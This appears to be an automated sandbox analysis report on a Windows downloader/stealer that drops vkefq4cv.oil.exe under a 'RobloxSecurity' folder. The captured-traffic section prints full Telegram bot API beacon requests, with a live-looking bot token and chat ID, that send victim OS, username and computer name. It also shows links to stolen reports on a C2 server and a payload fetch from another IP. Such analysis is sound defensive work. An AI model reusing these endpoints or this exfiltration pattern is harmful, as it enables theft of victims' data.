Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*TOP-A source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: cmd.exe, 00000005.00000003.1850351981.0000022BB8350000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2S source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\vkefq4cv.oil.exe source: cmd.exe, 00000005.00000002.1851434800.0000022BB8158000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Core.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: mscorlib.pdb! source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Configuration.pdbx source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD37000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831EneJ source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: winload_prod.pdbWINLOA~1.PDBWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*0 source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Management.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Drawing.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2E source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\Boss\Desktop\Laps\Laps\obj\Release\Laps.pdb source: jqOHOuPMJP.exe
Source:	Binary string: System.Management.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Core.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831o source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831n source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD0C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: ntkrnlmp.pdbl source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	4_2_00007FFD9B9A5133
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	11_2_00007FFD9B974B99
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B981888h	11_2_00007FFD9B981353
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B98016Dh	11_2_00007FFD9B97FF54
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B974622h	11_2_00007FFD9B973E71
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B98B834h	11_2_00007FFD9B98B67A
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	11_2_00007FFD9B973DA8
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B9775FCh	11_2_00007FFD9B9773F9
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B981FA1h	11_2_00007FFD9B981A79
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97D1B7h	11_2_00007FFD9B97C2B7
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	11_2_00007FFD9B97B97A
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B98E899h	11_2_00007FFD9B98E668
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	11_2_00007FFD9B97F5EF
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97D1B7h	11_2_00007FFD9B97CE3C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B9745F6h	11_2_00007FFD9B974574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B974622h	11_2_00007FFD9B974574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	18_2_00007FFD9B974B99
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97D197h	18_2_00007FFD9B978B08
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97CA9Ch	18_2_00007FFD9B978B08
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97CC93h	18_2_00007FFD9B978B08
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B980CADh	18_2_00007FFD9B980A2E
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	18_2_00007FFD9B97B95A
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B974622h	18_2_00007FFD9B973E71
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B98B814h	18_2_00007FFD9B98B678
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	18_2_00007FFD9B975E3E
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97EA38h	18_2_00007FFD9B97E4AE
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B981F81h	18_2_00007FFD9B981A59
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	18_2_00007FFD9B97F85F
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B98E879h	18_2_00007FFD9B98E7BC
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97D197h	18_2_00007FFD9B97CE1C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B9745F6h	18_2_00007FFD9B974574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B974622h	18_2_00007FFD9B974574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97771Ch	18_2_00007FFD9B977519
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	42_2_00007FFD9B984B99
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	42_2_00007FFD9B986690
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B984622h	42_2_00007FFD9B983E71
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B9845F6h	42_2_00007FFD9B984574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B984622h	42_2_00007FFD9B984574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B98771Ch	42_2_00007FFD9B987519
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	44_2_00007FFD9B966AB0
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B96771Ch	44_2_00007FFD9B967519
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	45_2_00007FFD9B996290
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B994622h	45_2_00007FFD9B9945E1
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B9945F6h	45_2_00007FFD9B994574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B99730Ch	45_2_00007FFD9B997109

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, type: DROPPED

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49738 -> 185.119.118.59:8080

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /byte/@jokerbot880901.txt HTTP/1.1Host: 82.147.85.194Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 82.147.85.194 82.147.85.194
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown

DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194

Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /byte/@jokerbot880901.txt HTTP/1.1Host: 82.147.85.194Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.248.208.221:80
